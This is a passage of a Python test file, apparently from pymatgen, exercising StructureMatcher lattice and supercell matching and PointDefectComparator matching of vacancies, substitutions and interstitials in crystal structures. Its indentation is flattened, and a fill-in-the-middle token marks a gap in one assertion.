"""Ensure Left handed lattices are accepted"""
sm = StructureMatcher()
s = Structure.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "Li3GaPCO7.json"))
self.assertTrue(sm.fit(s, s))
def test_as_dict_and_from_dict(self):
sm = StructureMatcher(
ltol=0.1,
stol=0.2,
angle_tol=2,
primitive_cell=False,
scale=False,
comparator=FrameworkComparator(),
)
d = sm.as_dict()
sm2 = StructureMatcher.from_dict(d)
self.assertEqual(sm2.as_dict(), d)
def test_no_scaling(self):
sm = StructureMatcher(ltol=0.1, stol=0.1, angle_tol=2, scale=False, comparator=ElementComparator())
self.assertTrue(sm.fit(self.struct_list[0], self.struct_list[1]))
self.assertTrue(sm.get_rms_dist(self.struct_list[0], self.struct_list[1])[0] < 0.0008)
def test_supercell_fit(self):
sm = StructureMatcher(attempt_supercell=False)
s1 = Structure.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "Al3F9.json"))
s2 = Structure.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "Al3F9_distorted.json"))
self.assertFalse(sm.fit(s1, s2))
sm = StructureMatcher(attempt_supercell=True)
self.assertTrue(sm.fit(s1, s2))
self.assertTrue(sm.fit(s2, s1))
def test_get_lattices(self):
sm = StructureMatcher(
ltol=0.2,
stol=0.3,
angle_tol=5,
primitive_cell=True,
scale=True,
attempt_supercell=False,
)
l1 = Lattice.from_parameters(1, 2.1, 1.9, 90, 89, 91)
l2 = Lattice.from_parameters(1.1, 2, 2, 89, 91, 90)
s1 = Structure(l1, [], [])
s2 = Structure(l2, [], [])
lattices = list(sm._get_lattices(s=s1, target_lattice=s2.lattice))
self.assertEqual(len(lattices), 16)
l3 = Lattice.from_parameters(1.1, 2, 20, 89, 91, 90)
s3 = Structure(l3, [], [])
lattices = list(sm._get_lattices(s=s1, target_lattice=s3.lattice))
self.assertEqual(len(lattices), 0)
def test_find_match1(self):
sm = StructureMatcher(
ltol=0.2,
stol=0.3,
angle_tol=5,
primitive_cell=True,
scale=True,
attempt_supercell=False,
)
l = Lattice.orthorhombic(1, 2, 3)
s1 = Structure(l, ["Si", "Si", "Ag"], [[0, 0, 0.1], [0, 0, 0.2], [0.7, 0.4, 0.5]])
s2 = Structure(l, ["Si", "Si", "Ag"], [[0, 0.1, 0], [0, 0.1, -0.95], [0.7, 0.5, 0.375]])
s1, s2, fu, s1_supercell = sm._preprocess(s1, s2, False)
match = sm._strict_match(s1, s2, fu, s1_supercell=True, use_rms=True, break_on_match=False)
scale_matrix = match[2]
s2.make_supercell(scale_matrix)
fc = s2.frac_coords + match[3]
fc -= np.round(fc)
self.assertAlmostEqual(np.sum(fc), 0.9)
self.assertAlmostEqual(np.sum(fc[:, :2]), 0.1)
cart_dist = np.sum(match[1] * (l.volume / 3) ** (1 / 3))
self.assertAlmostEqual(cart_dist, 0.15)
def test_find_match2(self):
sm = StructureMatcher(
ltol=0.2,
stol=0.3,
angle_tol=5,
primitive_cell=True,
scale=True,
attempt_supercell=False,
)
l = Lattice.orthorhombic(1, 2, 3)
s1 = Structure(l, ["Si", "Si"], [[0, 0, 0.1], [0, 0, 0.2]])
s2 = Structure(l, ["Si", "Si"], [[0, 0.1, 0], [0, 0.1, -0.95]])
s1, s2, fu, s1_supercell = sm._preprocess(s1, s2, False)
match = sm._strict_match(s1, s2, fu, s1_supercell=False, use_rms=True, break_on_match=False)
scale_matrix = match[2]
s2.make_supercell(scale_matrix)
s2.translate_sites(range(len(s2)), match[3])
self.assertAlmostEqual(np.sum(s2.frac_coords) % 1, 0.3)
self.assertAlmostEqual(np.sum(s2.frac_coords[:, :2]) % 1, 0)
def test_supercell_subsets(self):
sm = StructureMatcher(
ltol=0.2,
stol=0.3,
angle_tol=5,
primitive_cell=False,
scale=True,
attempt_supercell=True,
allow_subset=True,
supercell_size="volume",
)
sm_no_s = StructureMatcher(
ltol=0.2,
stol=0.3,
angle_tol=5,
primitive_cell=False,
scale=True,
attempt_supercell=True,
allow_subset=False,
supercell_size="volume",
)
l = Lattice.orthorhombic(1, 2, 3)
s1 = Structure(l, ["Ag", "Si", "Si"], [[0.7, 0.4, 0.5], [0, 0, 0.1], [0, 0, 0.2]])
s1.make_supercell([2, 1, 1])
s2 = Structure(l, ["Si", "Si", "Ag"], [[0, 0.1, -0.95], [0, 0.1, 0], [-0.7, 0.5, 0.375]])
shuffle = [0, 2, 1, 3, 4, 5]
s1 = Structure.from_sites([s1[i] for i in shuffle])
# test when s1 is exact supercell of s2
result = sm.get_s2_like_s1(s1, s2)
for a, b in zip(s1, result):
self.assertTrue(a.distance(b) < 0.08)
self.assertEqual(a.species, b.species)
self.assertTrue(sm.fit(s1, s2))
self.assertTrue(sm.fit(s2, s1))
self.assertTrue(sm_no_s.fit(s1, s2))
self.assertTrue(sm_no_s.fit(s2, s1))
rms = (0.048604032430991401, 0.059527539448807391)
self.assertTrue(np.allclose(sm.get_rms_dist(s1, s2), rms))
self.assertTrue(np.allclose(sm.get_rms_dist(s2, s1), rms))
# test when the supercell is a subset of s2
subset_supercell = s1.copy()
del subset_supercell[0]
result = sm.get_s2_like_s1(subset_supercell, s2)
self.assertEqual(len(result), 6)
for a, b in zip(subset_supercell, result):
self.assertTrue(a.distance(b) < 0.08)
self.assertEqual(a.species, b.species)
self.assertTrue(sm.fit(subset_supercell, s2))
self.assertTrue(sm.fit(s2, subset_supercell))
self.assertFalse(sm_no_s.fit(subset_supercell, s2))
self.assertFalse(sm_no_s.fit(s2, subset_supercell))
rms = (0.053243049896333279, 0.059527539448807336)
self.assertTrue(np.allclose(sm.get_rms_dist(subset_supercell, s2), rms))
self.assertTrue(np.allclose(sm.get_rms_dist(s2, subset_supercell), rms))
# test when s2 (once made a supercell) is a subset of s1
s2_missing_site = s2.copy()
del s2_missing_site[1]
result = sm.get_s2_like_s1(s1, s2_missing_site)
for a, b in zip((s1[i] for i in (0, 2, 4, 5)), result):
self.assertTrue(a.distance(b) < 0.08)
self.assertEqual(a.species, b.species)
self.assertTrue(sm.fit(s1, s2_missing_site))
self.assertTrue(sm.fit(s2_missing_site, s1))
self.assertFalse(sm_no_s.fit(s1, s2_missing_site))
self.assertFalse(sm_no_s.fit(s2_missing_site, s1))
rms = (0.029763769724403633, 0.029763769724403987)
self.assertTrue(np.allclose(sm.get_rms_dist(s1, s2_missing_site), rms))
self.assertTrue(np.allclose(sm.get_rms_dist(s2_missing_site, s1), rms))
def test_get_s2_large_s2(self):
sm = StructureMatcher(
ltol=0.2,
stol=0.3,
angle_tol=5,
primitive_cell=False,
scale=False,
attempt_supercell=True,
allow_subset=False,
supercell_size="volume",
)
l = Lattice.orthorhombic(1, 2, 3)
s1 = Structure(l, ["Ag", "Si", "Si"], [[0.7, 0.4, 0.5], [0, 0, 0.1], [0, 0, 0.2]])
l2 = Lattice.orthorhombic(1.01, 2.01, 3.01)
s2 = Structure(l2, ["Si", "Si", "Ag"], [[0, 0.1, -0.95], [0, 0.1, 0], [-0.7, 0.5, 0.375]])
s2.make_supercell([[0, -1, 0], [1, 0, 0], [0, 0, 1]])
result = sm.get_s2_like_s1(s1, s2)
for x, y in zip(s1, result):
self.assertLess(x.distance(y), 0.08)
def test_get_mapping(self):
sm = StructureMatcher(
ltol=0.2,
stol=0.3,
angle_tol=5,
primitive_cell=False,
scale=True,
attempt_supercell=False,
allow_subset=True,
)
l = Lattice.orthorhombic(1, 2, 3)
s1 = Structure(l, ["Ag", "Si", "Si"], [[0.7, 0.4, 0.5], [0, 0, 0.1], [0, 0, 0.2]])
s1.make_supercell([2, 1, 1])
s2 = Structure(l, ["Si", "Si", "Ag"], [[0, 0.1, -0.95], [0, 0.1, 0], [-0.7, 0.5, 0.375]])
shuffle = [2, 0, 1, 3, 5, 4]
s1 = Structure.from_sites([s1[i] for i in shuffle])
# test the mapping
s2.make_supercell([2, 1, 1])
# equal sizes
for i, x in enumerate(sm.get_mapping(s1, s2)):
self.assertEqual(s1[x].species, s2[i].species)
del s1[0]
# s1 is subset of s2
for i, x in enumerate(sm.get_mapping(s2, s1)):
self.assertEqual(s1[i].species, s2[x].species)
# s2 is smaller than s1
del s2[0]
del s2[1]
self.assertRaises(ValueError, sm.get_mapping, s2, s1)
def test_get_supercell_matrix(self):
sm = StructureMatcher(
ltol=0.1,
stol=0.3,
angle_tol=2,
primitive_cell=False,
scale=True,
attempt_supercell=True,
)
l = Lattice.orthorhombic(1, 2, 3)
s1 = Structure(l, ["Si", "Si", "Ag"], [[0, 0, 0.1], [0, 0, 0.2], [0.7, 0.4, 0.5]])
s1.make_supercell([2, 1, 1])
s2 = Structure(l, ["Si", "Si", "Ag"], [[0, 0.1, 0], [0, 0.1, -0.95], [-0.7, 0.5, 0.375]])
result = sm.get_supercell_matrix(s1, s2)
self.assertTrue((result == [[-2, 0, 0], [0, 1, 0], [0, 0, 1]]).all())
s1 = Structure(l, ["Si", "Si", "Ag"], [[0, 0, 0.1], [0, 0, 0.2], [0.7, 0.4, 0.5]])
s1.make_supercell([[1, -1, 0], [0, 0, -1], [0, 1, 0]])
s2 = Structure(l, ["Si", "Si", "Ag"], [[0, 0.1, 0], [0, 0.1, -0.95], [-0.7, 0.5, 0.375]])
result = sm.get_supercell_matrix(s1, s2)
self.assertTrue((result == [[-1, -1, 0], [0, 0, -1], [0, 1, 0]]).all())
# test when the supercell is a subset
sm = StructureMatcher(
ltol=0.1,
stol=0.3,
angle_tol=2,
primitive_cell=False,
scale=True,
attempt_supercell=True,
allow_subset=True,
)
del s1[0]
result = sm.get_supercell_matrix(s1, s2)
self.assertTrue((result == [[-1, -1, 0], [0, 0, -1], [0, 1, 0]]).all())
def test_subset(self):
sm = StructureMatcher(
ltol=0.2,
stol=0.3,
angle_tol=5,
primitive_cell=False,
scale=True,
attempt_supercell=False,
allow_subset=True,
)
l = Lattice.orthorhombic(10, 20, 30)
s1 = Structure(l, ["Si", "Si", "Ag"], [[0, 0, 0.1], [0, 0, 0.2], [0.7, 0.4, 0.5]])
s2 = Structure(l, ["Si", "Ag"], [[0, 0.1, 0], [-0.7, 0.5, 0.4]])
result = sm.get_s2_like_s1(s1, s2)
self.assertEqual(len(find_in_coord_list_pbc(result.frac_coords, [0, 0, 0.1])), 1)
self.assertEqual(len(find_in_coord_list_pbc(result.frac_coords, [0.7, 0.4, 0.5])), 1)
# test with fewer species in s2
s1 = Structure(l, ["Si", "Ag", "Si"], [[0, 0, 0.1], [0, 0, 0.2], [0.7, 0.4, 0.5]])
s2 = Structure(l, ["Si", "Si"], [[0, 0.1, 0], [-0.7, 0.5, 0.4]])
result = sm.get_s2_like_s1(s1, s2)
mindists = np.min(s1.lattice.get_all_distances(s1.frac_coords, result.frac_coords), axis=0)
self.assertLess(np.max(mindists), 1e-6)
self.assertEqual(len(find_in_coord_list_pbc(result.frac_coords, [0, 0, 0.1])), 1)
self.assertEqual(len(find_in_coord_list_pbc(result.frac_coords, [0.7, 0.4, 0.5])), 1)
# test with not enough sites in s1
# test with fewer species in s2
s1 = Structure(l, ["Si", "Ag", "Cl"], [[0, 0, 0.1], [0, 0, 0.2], [0.7, 0.4, 0.5]])
s2 = Structure(l, ["Si", "Si"], [[0, 0.1, 0], [-0.7, 0.5, 0.4]])
self.assertEqual(sm.get_s2_like_s1(s1, s2), None)
def test_out_of_cell_s2_like_s1(self):
l = Lattice.cubic(5)
s1 = Structure(l, ["Si", "Ag", "Si"], [[0, 0, -0.02], [0, 0, 0.001], [0.7, 0.4, 0.5]])
s2 = Structure(l, ["Si", "Ag", "Si"], [[0, 0, 0.98], [0, 0, 0.99], [0.7, 0.4, 0.5]])
new_s2 = StructureMatcher(primitive_cell=False).get_s2_like_s1(s1, s2)
dists = np.sum((s1.cart_coords - new_s2.cart_coords) ** 2, axis=-1) ** 0.5
self.assertLess(np.max(dists), 0.1)
def test_disordered_primitive_to_ordered_supercell(self):
sm_atoms = StructureMatcher(
ltol=0.2,
stol=0.3,
angle_tol=5,
primitive_cell=False,
scale=True,
attempt_supercell=True,
allow_subset=True,
supercell_size="num_atoms",
comparator=OrderDisorderElementComparator(),
)
sm_sites = StructureMatcher(
ltol=0.2,
stol=0.3,
angle_tol=5,
primitive_cell=False,
scale=True,
attempt_supercell=True,
allow_subset=True,
supercell_size="num_sites",
comparator=OrderDisorderElementComparator(),
)
lp = Lattice.orthorhombic(10, 20, 30)
pcoords = [[0, 0, 0], [0.5, 0.5, 0.5]]
ls = Lattice.orthorhombic(20, 20, 30)
scoords = [[0, 0, 0], [0.75, 0.5, 0.5]]
prim = Structure(lp, [{"Na": 0.5}, {"Cl": 0.5}], pcoords)
supercell = Structure(ls, ["Na", "Cl"], scoords)
supercell.make_supercell([[-1, 1, 0], [0, 1, 1], [1, 0, 0]])
self.assertFalse(sm_sites.fit(prim, supercell))
self.assertTrue(sm_atoms.fit(prim, supercell))
self.assertRaises(ValueError, sm_atoms.get_s2_like_s1, prim, supercell)
self.assertEqual(len(sm_atoms.get_s2_like_s1(supercell, prim)), 4)
def test_ordered_primitive_to_disordered_supercell(self):
sm_atoms = StructureMatcher(
ltol=0.2,
stol=0.3,
angle_tol=5,
primitive_cell=False,
scale=True,
attempt_supercell=True,
allow_subset=True,
supercell_size="num_atoms",
comparator=OrderDisorderElementComparator(),
)
sm_sites = StructureMatcher(
ltol=0.2,
stol=0.3,
angle_tol=5,
primitive_cell=False,
scale=True,
attempt_supercell=True,
allow_subset=True,
supercell_size="num_sites",
comparator=OrderDisorderElementComparator(),
)
lp = Lattice.orthorhombic(10, 20, 30)
pcoords = [[0, 0, 0], [0.5, 0.5, 0.5]]
ls = Lattice.orthorhombic(20, 20, 30)
scoords = [[0, 0, 0], [0.5, 0, 0], [0.25, 0.5, 0.5], [0.75, 0.5, 0.5]]
s1 = Structure(lp, ["Na", "Cl"], pcoords)
s2 = Structure(ls, [{"Na": 0.5}, {"Na": 0.5}, {"Cl": 0.5}, {"Cl": 0.5}], scoords)
self.assertTrue(sm_sites.fit(s1, s2))
self.assertFalse(sm_atoms.fit(s1, s2))
def test_disordered_to_disordered(self):
sm_atoms = StructureMatcher(
ltol=0.2,
stol=0.3,
angle_tol=5,
primitive_cell=False,
scale=True,
attempt_supercell=True,
allow_subset=False,
comparator=OrderDisorderElementComparator(),
)
lp = Lattice.orthorhombic(10, 20, 30)
coords = [[0.0, 0.0, 0.0], [0.5, 0.5, 0.5]]
s1 = Structure(lp, [{"Na": 0.5, "Cl": 0.5}, {"Na": 0.5, "Cl": 0.5}], coords)
s2 = Structure(lp, [{"Na": 0.5, "Cl": 0.5}, {"Na": 0.5, "Br": 0.5}], coords)
self.assertFalse(sm_atoms.fit(s1, s2))
def test_occupancy_comparator(self):
lp = Lattice.orthorhombic(10, 20, 30)
pcoords = [[0, 0, 0], [0.5, 0.5, 0.5]]
s1 = Structure(lp, [{"Na": 0.6, "K": 0.4}, "Cl"], pcoords)
s2 = Structure(lp, [{"Xa": 0.4, "Xb": 0.6}, "Cl"], pcoords)
s3 = Structure(lp, [{"Xa": 0.5, "Xb": 0.5}, "Cl"], pcoords)
sm_sites = StructureMatcher(
ltol=0.2,
stol=0.3,
angle_tol=5,
primitive_cell=False,
scale=True,
attempt_supercell=True,
allow_subset=True,
supercell_size="num_sites",
comparator=OccupancyComparator(),
)
self.assertTrue(sm_sites.fit(s1, s2))
self.assertFalse(sm_sites.fit(s1, s3))
def test_electronegativity(self):
sm = StructureMatcher(ltol=0.2, stol=0.3, angle_tol=5)
s1 = Structure.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "Na2Fe2PAsO4S4.json"))
s2 = Structure.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "Na2Fe2PNO4Se4.json"))
self.assertEqual(
sm.get_best_electronegativity_anonymous_mapping(s1, s2),
{
Element("S"): Element("Se"),
Element("As"): Element("N"),
Element("Fe"): Element("Fe"),
Element("Na"): Element("Na"),
Element("P"): Element("P"),
Element("O"): Element("O"),
},
)
self.assertEqual(len(sm.get_all_anonymous_mappings(s1, s2)), 2)
# test include_dist
dists = {Element("N"): 0, Element("P"): 0.0010725064}
for mapping, d in sm.get_all_anonymous_mappings(s1, s2, include_dist=True):
self.assertAlmostEqual(dists[mapping[Element("As")]], d)
def test_rms_vs_minimax(self):
# This tests that structures with adjusted RMS less than stol, but minimax
# greater than stol are treated properly
# stol=0.3 gives exactly an ftol of 0.1 on the c axis
sm = StructureMatcher(ltol=0.2, stol=0.301, angle_tol=1, primitive_cell=False)
l = Lattice.orthorhombic(1, 2, 12)
sp = ["Si", "Si", "Al"]
s1 = Structure(l, sp, [[0.5, 0, 0], [0, 0, 0], [0, 0, 0.5]])
s2 = Structure(l, sp, [[0.5, 0, 0], [0, 0, 0], [0, 0, 0.6]])
self.assertArrayAlmostEqual(sm.get_rms_dist(s1, s2), (0.32 ** 0.5 / 2, 0.4))
self.assertEqual(sm.fit(s1, s2), False)
self.assertEqual(sm.fit_anonymous(s1, s2), False)
self.assertEqual(sm.get_mapping(s1, s2), None)
class PointDefectComparatorTest(PymatgenTest):
def test_defect_matching(self):
# SETUP DEFECTS FOR TESTING
# symmorphic defect test set
s_struc = Structure.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "CsSnI3.cif")) # tetragonal CsSnI3
identical_Cs_vacs = [Vacancy(s_struc, s_struc[0]), Vacancy(s_struc, s_struc[1])]
identical_I_vacs_sublattice1 = [
Vacancy(s_struc, s_struc[4]),
Vacancy(s_struc, s_struc[5]),
Vacancy(s_struc, s_struc[8]),
Vacancy(s_struc, s_struc[9]),
] # in plane halides
identical_I_vacs_sublattice2 = [
Vacancy(s_struc, s_struc[6]),
Vacancy(s_struc, s_struc[7]),
] # out of plane halides
pdc = PointDefectComparator()
# NOW TEST DEFECTS
# test vacancy matching
self.assertTrue(pdc.are_equal(identical_Cs_vacs[0], identical_Cs_vacs[0])) # trivial vacancy test
self.assertTrue(pdc.are_equal(identical_Cs_vacs[0], identical_Cs_vacs[1])) # vacancies on same sublattice
for i, j in itertools.combinations(range(4), 2):
self.assertTrue(pdc.are_equal(identical_I_vacs_sublattice1[i], identical_I_vacs_sublattice1[j]))
self.assertTrue(pdc.are_equal(identical_I_vacs_sublattice2[0], identical_I_vacs_sublattice2[1]))
self.assertFalse(
pdc.are_equal(
identical_Cs_vacs[0],
# both vacancies, but different specie types
identical_I_vacs_sublattice1[0],
)
)
self.assertFalse(
pdc.are_equal(
identical_I_vacs_sublattice1[0],
# same specie type, different sublattice
identical_I_vacs_sublattice2[0],
)
)
# test substitutional matching
sub_Cs_on_I_sublattice1_set1 = PeriodicSite(
"Cs", identical_I_vacs_sublattice1[0].site.frac_coords, s_struc.lattice
)
sub_Cs_on_I_sublattice1_set2 = PeriodicSite(
"Cs", identical_I_vacs_sublattice1[1].site.frac_coords, s_struc.lattice
)
sub_Cs_on_I_sublattice2 = PeriodicSite("Cs", identical_I_vacs_sublattice2[0].site.frac_coords, s_struc.lattice)
sub_Rb_on_I_sublattice2 = PeriodicSite("Rb", identical_I_vacs_sublattice2[0].site.frac_coords, s_struc.lattice)
self.assertTrue(
pdc.are_equal( # trivial substitution test
Substitution(s_struc, sub_Cs_on_I_sublattice1_set1),
Substitution(s_struc, sub_Cs_on_I_sublattice1_set1),
)
)
self.assertTrue(
pdc.are_equal( # same sublattice, different coords
Substitution(s_struc, sub_Cs_on_I_sublattice1_set1),
Substitution(s_struc, sub_Cs_on_I_sublattice1_set2),
)
)
self.assertFalse(
pdc.are_equal( # different subs (wrong specie)
Substitution(s_struc, sub_Cs_on_I_sublattice2),
Substitution(s_struc, sub_Rb_on_I_sublattice2),
)
)
self.assertFalse(
pdc.are_equal( # different subs (wrong sublattice)
Substitution(s_struc, sub_Cs_on_I_sublattice1_set1),
Substitution(s_struc, sub_Cs_on_I_sublattice2),
)
)
# test symmorphic interstitial matching
# (using set generated from Voronoi generator, with same sublattice given by saturatated_
# interstitial_structure function)
inter_H_sublattice1_set1 = PeriodicSite("H", [0.0, 0.75, 0.25], s_struc.lattice)
inter_H_sublattice1_set2 = PeriodicSite("H", [0.0, 0.75, 0.75], s_struc.lattice)
inter_H_sublattice2 = PeriodicSite("H", [0.57796112, 0.06923687, 0.56923687], s_struc.lattice)
inter_H_sublattice3 = PeriodicSite("H", [0.25, 0.25, 0.54018268], s_struc.lattice)
inter_He_sublattice3 = PeriodicSite("He", [0.25, 0.25, 0.54018268], s_struc.lattice)
self.assertTrue(
pdc.are_equal( # trivial interstitial test
Interstitial(s_struc, inter_H_sublattice1_set1),
Interstitial(s_struc, inter_H_sublattice1_set1),
)
)
self.assertTrue(
pdc.are_equal( # same sublattice, different coords
Interstitial(s_struc, inter_H_sublattice1_set1),
Interstitial(s_struc, inter_H_sublattice1_set2),
)
)
self.assertFalse(
pdc.are_equal( # different interstitials (wrong sublattice)
Interstitial(s_struc, inter_H_sublattice1_set1),
Interstitial(s_struc, inter_H_sublattice2),<|fim▁hole|> pdc.are_equal( # different interstitials (wrong sublattice)
Interstitial(s_struc, inter_H_sublattice1_set1),
Interstitial(s_struc, inter_H_sublattice3),
)
)
self.assertFalse(
pdc.are_equal( # different interstitials (wrong specie)
Interstitial(s_struc, inter_H_sublattice3),
Interstitial(s_struc, inter_He_sublattice3),
)
)
# test non-symmorphic interstitial matching
# (using set generated from Voronoi generator, with same sublattice given by
# saturatated_interstitial_structure function)
ns_struc = Structure.from_file(os.path.join(PymatgenTest.TEST_FILES_DIR, "CuCl.cif"))
ns_inter_H_sublattice1_set1 = PeriodicSite("H", [0.06924513, 0.06308959, 0.86766528], ns_struc.lattice)
ns_inter_H_sublattice1_set2 = PeriodicSite("H", [0.43691041, 0.36766528, 0.06924513], ns_struc.lattice)
ns_inter_H_sublattice2 = PeriodicSite("H", [0.06022109, 0.60196031, 0.1621814], ns_struc.lattice)
ns_inter_He_sublattice2 = PeriodicSite("He", [0.06022109, 0.60196031, 0.1621814], ns_struc.lattice)
self.assertTrue(
pdc.are_equal( # trivial interstitial test
Interstitial(ns_struc, ns_inter_H_sublattice1_set1),
Interstitial(ns_struc, ns_inter_H_sublattice1_set1),
)
)
self.assertTrue(
pdc.are_equal( # same sublattice, different coords
Interstitial(ns_struc, ns_inter_H_sublattice1_set1),
Interstitial(ns_struc, ns_inter_H_sublattice1_set2),
)
)
self.assertFalse(
pdc.are_equal(
Interstitial(ns_struc, ns_inter_H_sublattice1_set1),
# different interstitials (wrong sublattice)
Interstitial(ns_struc, ns_inter_H_sublattice2),
)
)
self.assertFalse(
pdc.are_equal( # different interstitials (wrong specie)
Interstitial(ns_struc, ns_inter_H_sublattice2),
Interstitial(ns_struc, ns_inter_He_sublattice2),
)
)
# test influence of charge on defect matching (default is to be charge agnostic)
vac_diff_chg = identical_Cs_vacs[0].copy()
vac_diff_chg.set_charge(3.0)
self.assertTrue(pdc.are_equal(identical_Cs_vacs[0], vac_diff_chg))
chargecheck_pdc = PointDefectComparator(check_charge=True) # switch to PDC which cares about charge state
self.assertFalse(chargecheck_pdc.are_equal(identical_Cs_vacs[0], vac_diff_chg))
# test different supercell size
# (comparing same defect but different supercells - default is to not check for this)
sc_agnostic_pdc = PointDefectComparator(check_primitive_cell=True)
sc_scaled_s_struc = s_struc.copy()
sc_scaled_s_struc.make_supercell([2, 2, 3])
sc_scaled_I_vac_sublatt1_ps1 = PeriodicSite(
"I",
identical_I_vacs_sublattice1[0].site.coords,
sc_scaled_s_struc.lattice,
coords_are_cartesian=True,
)
sc_scaled_I_vac_sublatt1_ps2 = PeriodicSite(
"I",
identical_I_vacs_sublattice1[1].site.coords,
sc_scaled_s_struc.lattice,
coords_are_cartesian=True,
)
sc_scaled_I_vac_sublatt2_ps = PeriodicSite(
"I",
identical_I_vacs_sublattice2[1].site.coords,
sc_scaled_s_struc.lattice,
coords_are_cartesian=True,
)
sc_scaled_I_vac_sublatt1_defect1 = Vacancy(sc_scaled_s_struc, sc_scaled_I_vac_sublatt1_ps1)
sc_scaled_I_vac_sublatt1_defect2 = Vacancy(sc_scaled_s_struc, sc_scaled_I_vac_sublatt1_ps2)
sc_scaled_I_vac_sublatt2_defect = Vacancy(sc_scaled_s_struc, sc_scaled_I_vac_sublatt2_ps)
self.assertFalse(
pdc.are_equal(
identical_I_vacs_sublattice1[0],
# trivially same defect site but between different supercells
sc_scaled_I_vac_sublatt1_defect1,
)
)
self.assertTrue(sc_agnostic_pdc.are_equal(identical_I_vacs_sublattice1[0], sc_scaled_I_vac_sublatt1_defect1))
self.assertFalse(
pdc.are_equal(
identical_I_vacs_sublattice1[1],
# same coords, different lattice structure
sc_scaled_I_vac_sublatt1_defect1,
)
)
self.assertTrue(sc_agnostic_pdc.are_equal(identical_I_vacs_sublattice1[1], sc_scaled_I_vac_sublatt1_defect1))
self.assertFalse(
pdc.are_equal(
identical_I_vacs_sublattice1[0],
# same sublattice, different coords
sc_scaled_I_vac_sublatt1_defect2,
)
)
self.assertTrue(sc_agnostic_pdc.are_equal(identical_I_vacs_sublattice1[0], sc_scaled_I_vac_sublatt1_defect2))
self.assertFalse(
sc_agnostic_pdc.are_equal(
identical_I_vacs_sublattice1[0],
# different defects (wrong sublattice)
sc_scaled_I_vac_sublatt2_defect,
)
)
# test same structure size, but scaled lattice volume
# (default is to not allow these to be equal, but check_lattice_scale=True allows for this)
vol_agnostic_pdc = PointDefectComparator(check_lattice_scale=True)
vol_scaled_s_struc = s_struc.copy()
vol_scaled_s_struc.scale_lattice(s_struc.volume * 0.95)
vol_scaled_I_vac_sublatt1_defect1 = Vacancy(vol_scaled_s_struc, vol_scaled_s_struc[4])
vol_scaled_I_vac_sublatt1_defect2 = Vacancy(vol_scaled_s_struc, vol_scaled_s_struc[5])
vol_scaled_I_vac_sublatt2_defect = Vacancy(vol_scaled_s_struc, vol_scaled_s_struc[6])
self.assertFalse(
pdc.are_equal(
identical_I_vacs_sublattice1[0],
# trivially same defect (but vol change)
vol_scaled_I_vac_sublatt1_defect1,
)
)
self.assertTrue(vol_agnostic_pdc.are_equal(identical_I_vacs_sublattice1[0], vol_scaled_I_vac_sublatt1_defect1))
self.assertFalse(
pdc.are_equal(
identical_I_vacs_sublattice1[0],
# same defect, different sublattice point (and vol change)
vol_scaled_I_vac_sublatt1_defect2,
)
)
self.assertTrue(vol_agnostic_pdc.are_equal(identical_I_vacs_sublattice1[0], vol_scaled_I_vac_sublatt1_defect2))
self.assertFalse(
vol_agnostic_pdc.are_equal(
identical_I_vacs_sublattice1[0],
# different defect (wrong sublattice)
vol_scaled_I_vac_sublatt2_defect,
)
)
# test identical defect which has had entire lattice shifted
shift_s_struc = s_struc.copy()
shift_s_struc.translate_sites(range(len(s_struc)), [0.2, 0.3, 0.4], frac_coords=True, to_unit_cell=True)
shifted_identical_Cs_vacs = [
Vacancy(shift_s_struc, shift_s_struc[0]),
Vacancy(shift_s_struc, shift_s_struc[1]),
]
self.assertTrue(
pdc.are_equal(
identical_Cs_vacs[0],
# trivially same defect (but shifted)
shifted_identical_Cs_vacs[0],
)
)
self.assertTrue(
pdc.are_equal(
identical_Cs_vacs[0],
# same defect on different sublattice point (and shifted)
shifted_identical_Cs_vacs[1],
)
)
# test uniform lattice shift within non-symmorphic structure
shift_ns_struc = ns_struc.copy()
shift_ns_struc.translate_sites(range(len(ns_struc)), [0.0, 0.6, 0.3], frac_coords=True, to_unit_cell=True)
shift_ns_inter_H_sublattice1_set1 = PeriodicSite(
"H",
ns_inter_H_sublattice1_set1.frac_coords + [0.0, 0.6, 0.3],
shift_ns_struc.lattice,
)
shift_ns_inter_H_sublattice1_set2 = PeriodicSite(
"H",
ns_inter_H_sublattice1_set2.frac_coords + [0.0, 0.6, 0.3],
shift_ns_struc.lattice,
)
self.assertTrue(
pdc.are_equal(
Interstitial(ns_struc, ns_inter_H_sublattice1_set1),
# trivially same defect (but shifted)
Interstitial(shift_ns_struc, shift_ns_inter_H_sublattice1_set1),
)
)
self.assertTrue(
pdc.are_equal(
Interstitial(ns_struc, ns_inter_H_sublattice1_set1),
# same defect on different sublattice point (and shifted)
Interstitial(shift_ns_struc, shift_ns_inter_H_sublattice1_set2),
)
)
# test a rotational + supercell type structure transformation (requires check_primitive_cell=True)
rotated_s_struc = s_struc.copy()
rotated_s_struc.make_supercell([[2, 1, 0], [-1, 3, 0], [0, 0, 2]])
rotated_identical_Cs_vacs = [
Vacancy(rotated_s_struc, rotated_s_struc[0]),
Vacancy(rotated_s_struc, rotated_s_struc[1]),
]
self.assertFalse(
pdc.are_equal(
identical_Cs_vacs[0],
# trivially same defect (but rotated)
rotated_identical_Cs_vacs[0],
)
)
self.assertTrue(sc_agnostic_pdc.are_equal(identical_Cs_vacs[0], rotated_identical_Cs_vacs[0]))
self.assertFalse(
pdc.are_equal(
identical_Cs_vacs[0],
# same defect on different sublattice (and rotated)
rotated_identical_Cs_vacs[1],
)
)
self.assertTrue(
sc_agnostic_pdc.are_equal(
identical_Cs_vacs[0],
# same defect on different sublattice point (and rotated)
rotated_identical_Cs_vacs[1],
)
)
# test a rotational + supercell + shift type structure transformation for non-symmorphic structure
rotANDshift_ns_struc = ns_struc.copy()
rotANDshift_ns_struc.translate_sites(range(len(ns_struc)), [0.0, 0.6, 0.3], frac_coords=True, to_unit_cell=True)
rotANDshift_ns_struc.make_supercell([[2, 1, 0], [-1, 3, 0], [0, 0, 2]])
ns_vac_Cs_set1 = Vacancy(ns_struc, ns_struc[0])
rotANDshift_ns_vac_Cs_set1 = Vacancy(rotANDshift_ns_struc, rotANDshift_ns_struc[0])
rotANDshift_ns_vac_Cs_set2 = Vacancy(rotANDshift_ns_struc, rotANDshift_ns_struc[1])
self.assertTrue(
sc_agnostic_pdc.are_equal(
ns_vac_Cs_set1,
# trivially same defect (but rotated and sublattice shifted)
